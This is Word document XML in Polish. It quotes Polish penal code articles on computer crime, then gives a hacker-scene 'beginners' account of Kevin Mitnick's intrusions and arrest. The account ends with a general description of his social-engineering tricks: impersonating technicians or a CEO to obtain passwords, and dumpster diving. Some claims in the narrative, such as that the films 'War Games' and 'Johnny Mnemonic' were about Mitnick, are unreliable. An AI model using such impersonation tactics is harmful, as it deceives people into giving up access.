        <w:t xml:space="preserve">: Tej samej karze podlega ten, kto informacje uzyskaną określoną w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>§1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> lub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>§2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> ujawnia innej osobie.</w:t>
        <w:b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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ściganie przestępstwa określonego w paragrafach </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>1-4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> następuje na wniosek poszkodowane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rt.268</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>: Kto nie będąc do tego uprawnionym , niszczy, uszkadza, usuwa lub zmienia zapis istotnej informacji albo w inny sposób udaremnia lub znacznie utrudnia osobie uprawnionej zapoznanie się z nią, podlega grzywnie, karze ograniczenia wolności albo pozbawienia wolności do lat 2.</w:t>
        <w:b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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">: Jeżeli czyn określony w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>§1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> dotyczy zapisu na komputerowym nośniku informacji sprawca podlega karze do lat 3.</w:t>
        <w:b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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kto dopuszczając się czynu określonego w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>§1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> lub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>§2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> wyrządza znaczna szkodę majątkową podlega karze pozbawienia wolności od 3 miesięcy do lat 5.</w:t>
        <w:b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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ściganie przestępstwa określonego w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>§1-3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> następuje na wniosek pokrzywdzone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rt.269</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>: Kto, na komputerowym nośniku informacji, niszczy, usuwa, uszkadza lub zmienia zapis o szczególnym znaczeniu dla obronności kraju, bezpieczeństwa w komunikacji, funkcjonowaniu administracji rządowej, administracji samorządowej albo zakłóca, uniemożliwia automatyczne gromadzenie lub przekazywanie takich informacji podlega karze pozbawienia wolności od 6 miesięcy do lat 8.</w:t>
        <w:b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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>: Tej samej karze podlega ten kto dopuszcza się czynu określonego w</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, niszcząc lub wymieniając nośnik informacji lub niszcząc albo uszkadzając urządzenie służące automatycznemu przetwarzaniu, gromadzeniu lub przesyłaniu informacj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rt.278</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>: Kto zabiera w celu przywłaszczenia cudza rzecz ruchoma podlega karze pozbawienia wolności od 3 miesięcy do lat 5.</w:t>
        <w:br/>
        <w:t xml:space="preserve">Przepisy z </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>§1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> stosuje się odpowiednio do kradzieży energii lub karty upoważniającej do podjęcia pieniędzy z automatu bankowe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rt.287</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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>: Kto, w celu osiągnięcia korzyści materiałowej lub wyrządzenia innej osobie szkody, bez upoważnienia, wpływa na automatyczne przetwarzanie, gromadzenie lub przesyłanie informacji lub zmienia, usuwa albo wprowadza nowy zapis na komputerowym nośniku informacji podlega karze pozbawienia wolności od 3 miesięcy do lat 5.</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INFORMACJE DLA POCZĄTKUJĄCYCH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t;&gt; Sławni HAKERZY &lt;&l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dnym z obecnie najsławniejszych hackerów na świecie jest oczywisc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evin Mitnick (Kondor). Także to czołówki zalicz się John Draper (Captain Crun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evin D. Mitnick rozpoczął swoje "komputerowe eskapady" we wczesnym wieku, gdy dołączył do lokalnej gupy hackerskiej na obrzeżach Los Angeles. Swoje umiejętności zademonstrował poprzez włamanie się do komputera Monroe High School i zmieniając średnie ocen. Jednak legalne kłopoty zaczęły się gdy włamał się do komputera Obrony Powietrznej Ameryki Północnej w Colorado...mając 17 lat - było to w 1981 rok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iedługo pożniej zdobył wysokie umiejętności w phreakingu...jego apetyt na sprzęt przełącznia telefonow byl nienasycon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Żeby zdobyć zastrzeżone informacje, które były mu potrzebne Mitnick włamał się do biur korporacji Pacific Bell i zagarnął podręczniki komputerów oraz software na systemy komputerowe COSMOS i MicroPor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e względu na jego młody wiek tym razem uniknał konsekwencji prawn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evin polepszał wciąć swoje umiejętności (pożne lata 80'te), i unikał władz aż do 1989 rok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genci FBI zbierali dowody na to, że Mitnick i jego przyjaciel zwany DiCicco ukradli wysoko tajne programy komputerowe i zbiory badań z Digital Equipment Corp. Także naruszone zostało 17 wewnetrznych kodów dostepu należące do sieci MCI. Mitnick i DiCicco zostali aresztowani... a Urzędnik Sądowy w Los Angeles nakazał trzymać Mitnicka bez możliwości wpłacenia kaucji podpierając się argumente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uzbrojony w klawiaturę jest zagrożeniem dla bezpieczenstwa publiczne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systent Rzecznika Stanów Zjednoczonych powiedział: "osoba ta jest bardzo niebezpieczna i musi być trzymana z dala od komput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etektyw James K. Black, głowa wydziału przestępstw komputerowych w Departamencie Policji w Los Angeles powiedział o Mitnicku "on jest kilka poziomów wyżej, niż każda osoba, którą nazywacie hackerem komputerowym". W wieku 25 lat Mitnicka skazano na roczny pobyt w więzieniu o mninimalnym rygorz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ędzia który go skazała była Mariana R. Pfaelzer. Jego przyjaciel DiCicco świadczył przeciwko niem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był to rok 1989. Sędzia Pfaelzer nakazała także Mitnickowi na regularne uczęszczanie na sesje rehabilitacyjne opowiadając się na jego oddanie do właman komputerowych niczym nadużywanie jakiejś substancj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Federalni osakrzyciele także przedstawili rozkaz zabronienia Mitnickowi dostępu do przywileju telefonowania w chwili gdy znajduje się on w więzieniu. Zrobili to ze strachu przed tym, że mogłby zdobyć dostęp do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komputerów na zewnatrz.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Harriet Rosetto, dyrektor oddziału rehabilitacyjnego mowi: "hacking daje Kevinowi szacunek w sieci...coś czego nie miał w normalnym świecie. Nie kierował się sabotażem lub chciwością... on jest jak duże dziecko grające w Dungeons &amp; Dragon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Rok pożniej Mitnick został wypuszczony z zakładu a przydzielono mu oficera opiekuńczego. Raporty donosza o dziwnych rzeczach...telefon oficera, który go pilnowal zostal odłączony, a firma telefoniczna nie miała go w zapisach. Także zapis karty kredytowej sedzi w TRW inc. został niewytłumaczalnie skasowany. Ponadto zapisy dotyczące aresztowania Mitnicka zniknęły z komputerow sądowych... Mitnick wykiwał kuratora i uciekł z kraju aby odwiedzić kolegów hackerow w Israelu... znowu wpadł w kłopoty. Gdy wracał do USA agenci FBI dopadli go w jego rezydencji w Październiku 1992 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Mitnicka oskarżono o złamanie nakazu sądu, oraz o włamanie się do komputerow Kalifornijskiego Departamentu Maszyn Spalinowych. Autorytety tatże wierzyły, że był on odpowiedzialny za złamanie systemu  komputerowego Armii, oraz za nieautoryzowany dostęp do zapisów FBI - jeszcze jeden przykład do którego wykorzystane zostały ulubione techniki Kevin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 Grudniu 1992 roku Kevin Mitnick zniknął z powierzchni ziemi...znowu ścigany przez wiele władz federaln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ostawiając szlak podpowiedzi zaraz za nim przez nastepne dwa lata agenci FBI wierzyli, ze Mitnick prosto stworzył serie fałszywych identyfikacji. Uzbrojeni w jego wiedzę i umiejetnosci złapanie go będzie prost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go osoba wzbudziła ponowny alarm w środku 1994, gdy Motorola's Cellular Division zgłosiła, że kopie ich programów zostaly zabrane z przypiętego do sieci komputera. Dan Farmer, twórca "SATANA", programu który szuka słabości sieci komputerowych powiedział, że ktoś włamał się do jego komputera i ukradł wczesną wersję tego programu. Techniki zastosowane były typowe dla Kevina Mitnick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25 Grudnia 1994 roku, w dzień świat straszna wiadomość doszła do Tsutomu Shimomury, experta w dziedzinie zabezpieczeń w Narodowym Centrum Superkomputerów w San Die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Shimomura był właśnie na wakacjach w Nevadzie. Jego osobisty komputer, podpięty przez internet do Centrum Superkomputerow został spenetrowany.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ak to się mogło staś jednemu z największych speców w dziedzinie bezpieczeństwa w kraju?.... wstyd przed wszystkimi! Osobista skrzynka głosowa Shimomury została także skompromitowana 27 Grudnia tego same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roku...nagrany, bezczelny glos mówi "Niech cię diabli! Moja technika jest najlepsza... Nie wiesz kim jestem? ... Ja i moi przyjaciele... Zabijemy cię!". Także slychać było głosy dwóch innych ludzi na nagraniu...jeden z głosów mowił "ok szefie, twoje kung-fu jest calkiem niezłe" - kpiac sobie z narodowosci Shimomur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Gazety na całym świecie zostały zasypane historyjkami o nowej technice omijania zabezpieczeń nazywanej "Protocol Spoofing" - czyli podszywaniem się pod protokoły... Gdy Shimomura odkrył sposób włamania bezwłocznie powiadomił innych o tej technice. Intruz (Kevin Mitnick) najpierw wszedł do zaufanego komputera Uniwersytetu Laylola w Chicago, który miał autoryzowany dostęp do plików dostepu komputera Shimomury w Kaliforni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omendy przesyłu danych zostaly wysłane z "zaufanego" źródła żeby zdobyć dostęp do tysięcy wysoko tajnych programpw zabezpieczających na komputerze Shimomury. Kiedy zas to miało miejsce Mitnick przeniósł dane na konto w "Studni" - dużego providera Internetowego. Także zabrał i zmagazynował 20,000 kart kredytowych i konto w NetCom Inc..., wiele należących do milionerów "silikonowej doliny". Operator systemu "Studni" zanotował nagły wzrost liczby danych na koncie, które zwykle było puste. Bruce Koball, programista dla Freedom and Privacy Grou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den z właścicieli konta został powiadomiony o napływie danych i poproszony o ich sprawdzen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oball był zszokowany, gdy znalazl pliki Shimomury, i skontaktował się z nim w bardzo krótkim czas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ładze federalne zostały powiadomione, gdy odnaleziono numery kart kredytowych, i wtedy Shimomura gotów był do swojej zemsty. Bazy danych FBI dostarczyły listę możliwych podejrzeń, którymi można by obciażyć Mitnicka, lecz Kevin D. Mitnick był tylko jednym na szczycie listy. Jego włamanie było postrzegane jako "zabawa", bez chęc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yrządzenia szkód finansowych...wtedy FBI umieściło go na szczycie listy - ponad innymi wszystkim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dna z "żelaznych zasad" Kevina było nie trzymanie obciażających danych na własnej maszynie. Inne doniesienia mówia, że na koncie zostały znalezione także oprogramowanie skradzione z Motorola Cellular Division.</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himomura, prywatnie ośmieszony i obrażony, po naruszeniu reputaci rozpoczął zastawianie pułapki na intruz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ierwsze co zrobił, to zgrał głos intruza i udostepnił go w internecie dla wszystkich...wiedział, że to go zdenerwuje, że w koncu zdecyduje się "połknąć haczyk" jeśli jego ego zostanie naruszone - to miało w końcu przyprowadzić go do niego... Następnie 24 godzinne monitorowanie zostało założona na "Studni", wraz z uzbrojoną eskadrą z FBI i Narodowej Agencji Bezpieczeństwa...Shimomura cierpliwie czekał, kiedy bandyta wrócił i kilka razy przeszedł przez system. Pulapka podziałałą...Mitnick połknął haczyk... Na skrzynkę głosowej Shimomur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ostała przesłana wiadomości, na której głos mowił "Ah Tsutomu, mój wykształcony uczniu... widzę że umieściłeś mój głos na sieci... jestem bardzo rozczarowany mój syn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strożnie śledząc każdy z ataków, Shimomura i jego załoga expertów wraz z Kentem Walkerem byli w stanie namierzyć intruza. Mitnick zdawał się być w Colorado, ale z umiejętnościami tego typu cieżko było powiedzieć. Experci obserwowali każde włamanie, i stało się jasne, że system zabezpieczen "Studni" został poważnie skompromitowan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tudnia" zmieniła system na nowy Sun SPARC 100E ze względu na zaistniały incyden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14 Lutego 1995 roku władze namierzyły ich objekt podejrzeń w Releigh, w Północnej Karolin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 pomocą techników z Sprint Cellular, uzbrojeni w monitory częstotliwościowe dotarli do apartamentu na Players Court niedaleko lotniska Raleigh Durham. Federalni zaczaili się na lokatora... oczywiście pod innym nazwiskiem znanego...ale jednak Kevina D. Mitnick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itnick został ofiarą swego własnego ego. Był już poszukiwany w Kalifornii za włamanie do koncernu motornicze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ddał się bez oporu agentom FBI i środku nocy. Został aresztowany 15 Lutego 1995 roku. Jego komputery, oprogramowanie, książki, notatki i sprzęt telefoniczny został skonfiskowany...wszystko jako dowody. Władze wpadły w zachwyt, gdy odkryły motody którymi Mitnick włamywał się do ich systemu. Jego modem był wykorzystywany do łączenia się z serverem Spring Cellular na odwroconych kanałach, które zwykle wykorzystywane były do komunikacji z objektu mobilnego do bazy. Mitnick wtedy łączył się z biurem połączen GTE, i przekierowywał swój telefon d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olorado, gdzie łączył się z połączeniem internetowym NetCom. To sprawiało, że namierzenie było niemalże niemożliwe nawet dla najlepszych ekspertów. W internecie Mitnick mógł łączyć się z tysiącami komputerów na całym świec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himomura i Mitnick spotkali sie po raz pierwszy na sali sądowej w Raleigh w Polnocnej Karolinie. Mitnick popatrzył na Shimomure i powiedział "Cześć Tsutomu, respektuje twoje umiejętności", na co Shimomura symbolicznie ukłonił głow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 Piątej Konferencji Komputerów, Wołności i Prywatności, która odbyła się 28 Marca 1995 roku w Burlingame w Kaliforni Kevin Mitnick był gorącym tematem rozmów na temat wysoko-poziomowych zabezpieczeń komputerow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den z uczestników porównał Mitnicka do twórcy Sputnika, bo on tak samo jak Rosjanie wyprzedzili USA w wyścigu o loty w kosmos, wyprzedził narodowe bezpieczenstwo komputerow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Nazwany "Computerowym terrorystą" przez Departament Sprawiedliwości, Mitnick stał się tematem wielu ksiażek, artykułów, i filmów włączając "Gry Wojenne" i przebój "Jonny Mnemonic". 10 Lipca 1995 roku został postawiony przed sądem i oskarżony o złamanie 23 federalnych paragrafów włączając np. nielegalny dostep do telefonu, kradzierz tajnych danych, naruszenie bezpieczeństwa narodowego. Należy wspomnieć że za każdy powinien otrzymac karę 20 lat więzieni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31 Marca 1996 rozpoczęła się masywna akcja sieciowa w walce o uwolnienie K.Mitnick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a akcja będzie trwała, póki nasz przyjaciel Kevin nie zostanie puszczony woln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niżej kolejny text o Kevin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We wrześniu 1985 roku Kevin zapisał się na zajęcia w centrum Kształcenia Komputerowego w Los Angeles. Wyglądało na to, że chce rozstać się z przeszłością i w jakiś sposób ukierunkować swą fascynację komputerami na zapewnienie sobie przyzwoitego bytu. Kevin był poważnym studentem, ale na zajęciach nauczył się nie tylko sprawności technicznych. Pewnego wieczoru gdy pracował w pracowni komputerowej wdał się w e-mailową rozmowę z niewysoką, poważną, atrakcyjną brunetką siedzącą po drugiej stronie sali. Po chwili pogawędki zaprosił ją na kolację. Ona jednak propozycję odrzuciła. Była zaręczona. Ponieważ nalegał, obiecała, że może w następnym tygodniu. Gdzieś po miesiącu spotykali się już regularnie. Nazywała się Bonnie Vitello. Była dw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lata starsza od Kevina, miała za sobą jedno małżeństwo i była o krok o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rugiego. Mimo to, Kevin, który w tym okresie był dosyć otyły, frapował ją. Wydawał się całkiem miły, inteligentny, poważny i dobroduszny - roześmiał się głośno, gdy powiedziała mu, że pracuje w GTE, jednym z miejscowych przedsiębiorstw telefonicznych (ale przypade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 niedługim czasie zaręczyny Bonnie zostały zerwane, a jej nowy znajomy, Kevin, mieszkał z nią w jej małym mieszkanku w Thousand Oak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Fakt ten nie przeszkadzał mu w hackowaniu. W następnym roku Mitnick wszedł do NCSC - Narodowego Centrum Bezpieczeństwa Komputerowego, udając pracownika technicznego. Od jednej z zatrudnionych osób udało mu się wyłudzić hasł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 tydzień przed planowanym małżeństwem mieszkanie Bonnie zostało przeszukane przez policję, która zajęła komputer, modem, dyskietki i wszystkie podręczniki komputerowe. Kevin najwidoczniej znowu narozrabiał - tym razem "zabawił się" oprogramowaniem przedsiębiorstwa programistycznego Santa Cruz Operation, które wyprodukowało jedną z wersji systemu operacyjnego UNIX dostosowaną do pracy na komputerach osobistych. Administratorzy systemu obawiali się, że Kevin mógłb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ukraść należącą do nich niekomercyjną wersję programu. Z punktu widzenia Santa Cruz Operation sytuacja była poważnie negatywna, w grę wchodziły setki tysięcy dolarów, nie mówiąc już o reputacji przedsiębiorstwa. SCO próbowała dogadać się z Mitnickem, otrzymał on nawet własne hasło ("hacker"). Zgodziła się nie podawać sprawy do sądu, w zamian za informacje o metodzie włamania. W końcu, powiadomili jednak o poczynaniach Kevina policję. Odszukanie w Thousand Oaks adresu Bonnie, skąd dokonywano połączeń telefonicznych nie było trudn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ż do tej chwili Kevin miał czystą "dorosłą" kartotekę. Został oskarżony o bezprawne wejście do komputera - kategoria przestępstwa o niewielkiej szkodliwości społecznej. Jego prawnikowi udało się zbić kategorię do "przewinienia", za które Kevin został skazany na 36 miesięcy nadzoru sądowego. Musiał też zgodzić się na spotkanie z operatorem systemu Santa Cruz Operation, który chciał wypytać go o dziury znalezione przez Kevina w ich systemie zabezpieczeń.</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oniec końców Kevin i Bonnie pobrali się 9 czerwca 1987 roku w Woodland Hills. Zorganizowali małe przyjęcie w domu jej matki. Mimo kłopotów, Kevin wydawał się szczęśliwy. Bonnie potrafiła wykrzesać z niego to co najlepsze: stracił też na wadze i wydawał się być pewniejszy siebie. Widać to było nawet na zdjęciu do prawa jazdy, które zrobił niedługo po ślubie. Miał dwadzieścia trzy lata, metr siedemdziesiąt pięć wzrostu i sto kilogramów wagi. Gładko wygolony, a w jego niebieskich oczach błyskał optymiz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y trochę oszczędzić, przeprowadził się z Bonnie do małego mieszkani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spółdzielczego w Panorama City, do matki, która w dalszym ciągu pracowała w delikatesach. Bonnie natomiast, od dziewiątej do piątej po południu pracowała w GTE, a Kevin spędzał całe dnie próbując znaleźć jakąś prawdziwą robotę. Przynajmniej wydawało mu się, że chce zbudować sobie przyszłość i naprawdę się starał to zrobić. Wysyłał dziesiątki listów z zapytaniem o pracę. W załączonym życiorysie wyszczególniał, jak i gdzie zdobywał doświadczenie, oraz wymieniał całą masę systemów operacyjnych i oprogramowania, którymi potrafił się posługiwać ( między innymi: VM/CMS, OS/VS1, DOS/VSE, MS-DOS, RSTS/E, VAX/VMS, UNIX, TOP-20 ...) W rubryce "Cele" wpisywał: "Kariera programisty komputerowego".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 pomocą Bonnie został w październiku 1987 roku przyjęty do GTE. Ale już po tygodniu został odprowadzony do samochodu przez ochroniarza, bo GTE dowiedział się o jego kryminalnej przeszłości. Jak się przekonał, skazani przestępcy komputerowi, nawet po odsiedzeniu wyroku nie mają łatwego życia. Kilka miesięcy późnej szczęście uśmiechnęło się do niego. Nie robiąc sobie wielkich nadziei, złożył podanie o pracę jako konsultant do spraw elektronicznych przelewów bankowych w Security Pacific Bank. Zgodnie z poleceniem, wypełnił formularz podaniowy swoim wielkim, nieporządnym, prawie dziecięcym pismem. Czy to z rozpaczy, czy aby wprowadzić ich w błąd, w rubryce, gdzie miał dać odpowiedź na pytanie, czy był karany, odhaczył odpowiedz "n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u swemu zaskoczeniu, otrzymał z sekcji osobowej banku list z wiadomością, iż otrzymał pracę. Był cały szczęśliwy. Miał zarabiać 34 tys. dolarów rocznie, co w jego oczach było górą pieniędzy. Miała to być jego pierwsza dobrze płatna praca w życi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nowu jednak wyprzedziła go jego zła sława. Donn Parker, konsultant d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bezpieczeństwa komputerowego w SRI, zespole badawczym do spraw now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echnologii w Palo Alto, dowiedział się, że Kevin ma zostać przyjęty do pracy w banku i poinformował ich o przeszłości Kevina. Jim Black, detektyw z wydziału policyjnego Los Angeles zajmujący się przestępstwami komputerowymi, zrobił to sam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zień przed rozpoczęciem pracy oferta zatrudnienia została wycofan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tóregoś dnia Donn Parker, który kilka miesięcy wcześniej przyczynił się do wycofania oferty pracy dla Kevina, podniósł słuchawkę telefonu w swoim biurze w SRI i usłyszał: "Cześć Donn. Mówi Kevin Mitnick". Parker aż zaniemówił z wrażenia. Ale po paru minutach rozmowy zdał sobie sprawę, że Kevin szuka nie zemsty, a pracy (najwidoczniej nie miał pojęcia jaką rolę Parker odegrał w odcięciu go od Security Pacific). Uderzyło go, że Kevin mówi tonem profesjonalisty. Był uprzejmy i tryskał humorem. Zdawał się wiele wiedzieć o pracy, którą Parker wykonywał - o kontrolach zabezpieczeń do informacji wykonywanych na zlecenie różnych przedsiębiorstw i o badaniach nad przestępczością komputerową, prowadzonych na zlecenie Departamentu Sprawiedliwośc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ic w tym szczególnie dziwnego, że Kevin odszukał Park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Był on swego rodzaju patronem dla wielu młodych hackerów. Jeśli kogoś polubił, mógł mu znaleźć robotę wysoko płatnego konsultanta do spraw bezpieczeństwa. Ta reputacja to jednak w większości mit. To prawda czasem zatrudniał dzieciaki o szczególnych zdolnościach komputerowych, ale wymagał czegoś więcej niż czystej fantazji i pustych słów.Kevin zadał mu pytanie wpros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Szukam pracy konsultanta do spraw bezpieczeństwa danych. Czy SRI chciałoby mnie zatrudnić?"</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Nie, raczej nie - odpowiedział Parker poważnym głose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SRI zatrudnia tylko doświadczonych i sprawdzonych ludz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ówił Kevinowi to samo, co wszystkim hackero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Wróć do szkoły, zdobądź dyplom z nauk komputerowych albo administracji handlowej. Potem znajdź posadę, popracuj tam przez parę lat, zdobądź zaufanie ludzi i udowodnij mi, że jesteś człowiekiem poważnym, na którym można polegać. Wtedy będziemy mogli porozmawiać i zobaczymy co da się zrobić.</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evin przyjął decyzję bes protestów. Podziękował Parkerowi za radę.</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tem pożegnał się i odłożył słuchawkę.</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ilka miesięcy później, kiedy zajęto komputer Kevina w trakcie aresztowania, Parker domyślił się, w jaki sposób Kevin mógł być tak dobrze przygotowany do odbytej rozmowy: zanim zadzwonił, najwidoczniej włamał się do jego komputera i wykradł stamtąd pocztę elektroniczną z poprzednich kilku tygodn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Tak skończyła się kariera Kevina Mitnicka (znanego również jako Kondor), jednegoz najbardziej poszukiwanych włamywaczy komputerowych (hackera, a może crackera) na świecie. Człowiekiem, który najbardziej przysłużył się do jego aresztowania był Tsutomu Shimomura, specjalista od zabezpieczeń komputerowych i ...hacker. Hacker stojący po właściwej stronie prawa. Pewne jest, że Japończyk był osobiście zainteresowany złapaniem Mitnicka. Nie mógł przeboleć własnej porażki: Kevin włamał się do jego komputera i ukradł informacje na temat zabezpieczeń oraz programy do tego służące.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 jaki sposób włamywał się do strzeżonych komputerów? Kevin Mitnick zdobywa, hasła wędrując po biurach i podając się za serwisanta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New CE" w:cs="Courier New CE" w:ascii="Courier New CE" w:hAnsi="Courier New CE"/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Po prostu prosi, o hasła, które były mu rzekomo potrzebne do "wykonania pracy". Zdarzało mu się grzebać w śmietnikach firm telekomunikacyjnych i analizował znalezione tam wydruki (to jest dopiero źródło informacji!). Jednym z jego popisowych "numerów" było zatelefonowanie do administratora sieci dużej firmy, podanie się za jej prezesa i zażądanie hasła do systemu. Wydaje się to niewiarygodne, lecz takie właśnie metody były często niezwykle skuteczne. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New CE" w:hAnsi="Courier New CE" w:eastAsia="Courier New CE" w:cs="Courier New CE"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
